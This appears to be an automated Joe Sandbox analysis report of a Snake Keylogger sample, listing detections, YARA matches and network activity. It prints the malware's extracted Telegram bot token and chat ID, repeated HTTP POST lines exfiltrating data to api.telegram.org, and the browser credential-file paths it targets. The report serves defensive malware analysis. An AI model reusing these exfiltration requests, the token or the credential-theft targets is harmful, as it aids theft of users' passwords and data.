Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0OZQi3b0tM.exe

Overview

General Information

Sample Name:0OZQi3b0tM.exe
Analysis ID:652382
MD5:a90c091abded4a4f763de7537f569167
SHA1:9394b05c2d518ee5d75fb030f2dca6d15c44bf0a
SHA256:653b29296dcc50bfb59898d3ba38748b1c484701079ccc85f45bd2c0e4ecbe3e
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 0OZQi3b0tM.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\0OZQi3b0tM.exe" MD5: A90C091ABDED4A4F763DE7537F569167)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram Token": "5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c", "Telegram ID": "1856108848"}
{"C2 url": "https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendMessage"}
SourceRuleDescriptionAuthorStrings
0OZQi3b0tM.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
0OZQi3b0tM.exeJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0OZQi3b0tM.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0OZQi3b0tM.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0OZQi3b0tM.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xb0db3:$m1: | Snake Keylogger
          • 0x118431:$m1: | Snake Keylogger
          • 0x118ec8:$m1: | Snake Keylogger
          • 0x11995d:$m1: | Snake Keylogger
          • 0x11a3f2:$m1: | Snake Keylogger
          • 0x11ae87:$m1: | Snake Keylogger
          • 0x11b91c:$m1: | Snake Keylogger
          • 0x11c3b3:$m1: | Snake Keylogger
          • 0x11ce48:$m1: | Snake Keylogger
          • 0x11d8dd:$m1: | Snake Keylogger
          • 0x11e372:$m1: | Snake Keylogger
          • 0x11ee07:$m1: | Snake Keylogger
          • 0x11f89c:$m1: | Snake Keylogger
          • 0x120331:$m1: | Snake Keylogger
          • 0x120dc6:$m1: | Snake Keylogger
          • 0x12185b:$m1: | Snake Keylogger
          • 0x1222f0:$m1: | Snake Keylogger
          • 0x122d85:$m1: | Snake Keylogger
          • 0x12381a:$m1: | Snake Keylogger
          • 0x1242af:$m1: | Snake Keylogger
          • 0x124d44:$m1: | Snake Keylogger
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xd9d:$m1: | Snake Keylogger
          • 0xcd3:$m3: SnakePW
          00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x6c5:$m1: | Snake Keylogger
          • 0x5fb:$m3: SnakePW
          00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xbdd:$m1: | Snake Keylogger
          • 0xb13:$m3: SnakePW
          00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x7dd:$m1: | Snake Keylogger
          • 0x713:$m3: SnakePW
          00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xdd5:$m1: | Snake Keylogger
          • 0xd0b:$m3: SnakePW
          Click to see the 118 entries
          SourceRuleDescriptionAuthorStrings
          0.2.0OZQi3b0tM.exe.530000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
          0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.0.0OZQi3b0tM.exe.530000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 9 entries
                No Sigma rule has matched
                Timestamp:192.168.2.5193.122.130.049746802842536 06/26/22-09:32:22.672654
                SID:2842536
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0OZQi3b0tM.exeVirustotal: Detection: 73%Perma Link
                Source: 0OZQi3b0tM.exeMetadefender: Detection: 48%Perma Link
                Source: 0OZQi3b0tM.exeReversingLabs: Detection: 88%
                Source: 0OZQi3b0tM.exeAvira: detected
                Source: 0OZQi3b0tM.exeJoe Sandbox ML: detected
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c", "Telegram ID": "1856108848"}
                Source: 0OZQi3b0tM.exe.7100.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendMessage"}
                Source: 0OZQi3b0tM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49948 version: TLS 1.2
                Source: 0OZQi3b0tM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67507h0_2_00C67196
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C663D1h0_2_00C66111
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F539h0_2_00C6F280
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C68687h0_2_00C683C9
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C65F70h0_2_00C65587
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F991h0_2_00C6F6D8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h0_2_00C666F8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67967h0_2_00C676A8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6EC8Ah0_2_00C6E758
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67DC7h0_2_00C67B08
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6FDE9h0_2_00C6FB31
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F0E1h0_2_00C6EE29
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C68227h0_2_00C67F68
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h0_2_00C666E8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_00C64AA8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h0_2_00C66A3E
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC0741h0_2_04EC0498
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC02E9h0_2_04EC0040
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC0B99h0_2_04EC08F0

                Networking

                barindex
                Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.5:49746 -> 193.122.130.0:80
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974Host: api.telegram.orgContent-Length: 504Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d450ded5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d4bc2909Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d4fa25d0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d535c47fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d57ae485Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d5b1ba0cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d5f47c57Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d62b529cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d666ed16Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d69dc2b3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d6ea0e18Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d725a9d7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d763a5beHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d7a1a28aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d7dd3d95Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d82988cbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d875d3f9Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d8b3d0eaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d8ef6bb4Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9348fb3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d96b65d8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9a700e3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9e4fdfaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756da20995dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756da5e9696Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756daa3ba90Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dad82d11Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db162a23Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db6275f7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db96eb51Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dbd4e751Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc108764Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc4756f0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc82f3cdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dccf3ddeHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dd2c38c7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ddc4cf8aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756de5d655eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dea2895dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dee54c34Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df23493cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df57bcdbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df95b910Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dfca2db5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e00f5165Host: api.telegram.orgContent-Length: 504
